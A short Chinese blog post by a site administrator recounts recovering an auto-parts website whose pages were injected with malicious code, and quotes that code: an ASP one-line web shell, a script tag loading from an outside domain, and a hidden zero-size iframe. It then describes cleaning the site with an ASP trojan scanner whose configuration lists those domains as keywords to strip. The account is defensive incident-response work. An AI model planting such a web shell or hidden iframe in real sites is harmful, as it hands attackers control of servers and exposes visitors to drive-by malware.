6.1下午要下班的时候,发现神州汽配网出错错误,后来排除发现是被人挂马了.
所以HTML,ASP,JS文件都被加入了以下代码:
<%execute(request("c"))%>(这一句,只有部分文件有)
<script language="JavaScript" charset="gb2312" type="text/javascript" src="http://www8.itsun.com/count.php?uuid=1746114&style=none"></script><iframe src="http://vip.yc05.com/money.htm?id=74" width="0" height="0" frameborder="0"></iframe>
还有一个打开全是乱码的文件.可能就是加密后的木马程序
先想到要FTP上传,覆盖文件,可上传的速度实在太慢(挂在公网,都慢得好命)
然后在网上下载了雷客图ASP站长安全助手1.6SP1版,可批量删除的功能用了半天,都没有用.
最后找到了淘特ASP木马扫描器
(最新版)增加了对iframe,script的检查，可以恢复被大量置入iframe的网页。免得手动去删除的麻烦。
修改virus_lib.asp
virus_lib.asp增加了对iframe,script的控制参数分别为：
Const removeIframe=true '是否检查iframe
Const IframeKey="vip.yc05" 'iframe 中的关键字，如果出现系统将自动清除
Const removeScript=true '是否检查script
Const ScriptKey="www8.itsun" 'script中的关键字，如果出现系统将自动清除
Const ScanFileType = "asp,js,asa,cdx,htm,html"'扫描文件类型

然后上传,经测试问题基本解决:

＋———————＋
｜登录密码：totscan｜
＋———————＋
淘特ASP木马扫描器 原地址http://cms.tot.name/cms/rar/tot-asp-scan.rar
或 点击下载此文件